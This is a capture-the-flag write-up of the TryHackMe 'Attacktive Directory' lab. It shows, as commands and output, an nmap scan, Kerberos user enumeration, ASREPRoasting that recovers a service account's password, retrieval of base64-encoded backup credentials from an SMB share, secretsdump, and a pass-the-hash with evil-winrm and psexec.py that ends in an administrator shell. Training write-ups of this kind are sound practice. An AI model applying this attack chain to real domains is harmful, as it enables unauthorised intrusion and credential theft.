Attacktive Directory

https://tryhackme.com/room/attacktivedirectory#

Enumeration

Nmap

└──╼ [??]$ sudo nmap -sC -sV -oN nmap.out 10.10.75.70
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-09 09:16 +0630
Nmap scan report for 10.10.75.70
Host is up (0.82s latency).
Not shown: 987 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-11-09 02:49:09Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2021-11-08T02:48:07
|_Not valid after:  2022-05-10T02:48:07
|_ssl-date: 2021-11-09T02:50:08+00:00; +1m40s from scanner time.
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1m39s, deviation: 0s, median: 1m38s
| smb2-time: 
|   date: 2021-11-09T02:49:56
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.82 second

As nmap output add spookysec.local to /etc/hosts

echo $ip spookysec.local | sudo tee -a /etc/hosts

We can use enum4linux to enumerate SMB for Users, Shares, etc..., but this is along output and I didn't add in this section cause of there is not much interesting information.

Kerberos Enumeration

We can bruteforce the domain controller with usernames and password list that are already given for this room and download it. To enumerate this, we can use this tool.

./kerbrute_linux_amd64 userenum -d spookysec.local --dc spookysec.local userlist.txt -t 100

After the enumeration of user accounts is finished, we can attempt to abuse a feature within Kerberos with an attack method called ASREPRoasting. ASReproasting occurs when a user account has the privilege "Does not require Pre-Authentication" set. This means that the account does not need to provide valid identification before requesting a Kerberos Ticket on the specified user account.

Impacket provides a tool called GetNPUsers.py which searches the domain, lets attack the admin, svc-admin ,

┌─[sheinn101@parrot]─[~/thm/attacktive-directory]
└──╼ [??]$ python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py spookysec.local/svc-admin -no-pass
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for svc-admin
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:70c17da210a04ee11128df4a37c8182b$3cd76ee5ee8a5b1aea8fd85c27ce721b625ae4e8af0781110738fe2a945e09e08ddd30e8ca824c15cccbe7ed2a4b5e894fb921a8b2418c788e23bd97cdcd0c4cc86aacbdac3a8869c0c194fb1d70bebe81bd3d970bb590cd4b10dc693571398d7b22645e38b6b1e5000e90ecd2971008db0de575d1c808e3450a4aec2a3ca31d355b6a2ce1538c5d7209debac10c118f244410b7a831dd00ccc808996d0a681699f389203a30d6cae39c58429bb174a1d8819145e11cc25a22cadd36ad6900b7299396d6c4368803bb15a26974453a38b51730825b53f4f263eeb2f1c5008a97c15d73f45c044482eeb761b10c281a1f4e4c

management2005

Privilege Escalation

Now we have credentials for smb server , svc-admin:management2005 ,

┌─[sheinn101@parrot]─[~/thm/attacktive-directory]
└──╼ [??]$ smbmap -H spookysec.local -d spookysec.local -u svc-admin -p management2005
[+] Finding open SMB ports....
[+] User SMB session established on spookysec.local...
[+] IP: spookysec.local:445     Name: unknown                                           
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        .                                                  
        dr--r--r--                0 Sat Apr  4 19:08:39 2020    .
        dr--r--r--                0 Sat Apr  4 19:08:39 2020    ..
        fr--r--r--               48 Sat Apr  4 19:08:53 2020    backup_credentials.txt
        backup                                                  READ ONLY
        C$                                                      NO ACCESS       Default share

There is one interesting file which is called backup_credentials.txt in backup folder, Let's login and download it.

┌─[sheinn101@parrot]─[~/thm/attacktive-directory]
└──╼ [??]$ smbclient \\\\10.10.75.70\\backup -U svc-admin
Enter WORKGROUP\svc-admin's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Apr  5 01:38:39 2020
  ..                                  D        0  Sun Apr  5 01:38:39 2020
  backup_credentials.txt              A       48  Sun Apr  5 01:38:53 2020

                8247551 blocks of size 4096. 3571598 blocks available
smb: \> get backup_credentials.txt
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \>

┌─[sheinn101@parrot]─[~/thm/attacktive-directory]
└──╼ [??]$ cat backup_credentials.txt 
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw┌─[sheinn101@parrot]─[~/thm/attacktive-directory]
└──╼ [??]$ cat backup_credentials.txt | base64 -d
backup@spookysec.local:backup2517860┌─[sheinn101@parrot]─[~/thm/attacktive-directory]
└──╼ [??]$ 

backup@spookysec.local:backup2517860

Now we have another account, let's use impacket tool which is call secretsdump.py to view all the password hashes this user can access.

We get administrator password hashes, you can crack this hash but we can use Pass The Hash method with evil-winrm and psexec.py tools.

Evil-Winrm

┌─[sheinn101@parrot]─[~/thm/attacktive-directory]
└──╼ [??]$ evil-winrm -i 10.10.75.70 -u administrator -H 0e0363213e37b94221497260b0bcb4fc

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
thm-ad\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Psexec.py

python3 /usr/share/doc/python3-impacket/examples/psexec.py administrator:@spookysec.local -hashes aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on spookysec.local.....
[*] Found writable share ADMIN$
[*] Uploading file hFPZJEou.exe
[*] Opening SVCManager on spookysec.local.....
[*] Creating service ekJz on spookysec.local.....
[*] Starting service ekJz.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1490]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

Now we get Administrator access.

pwned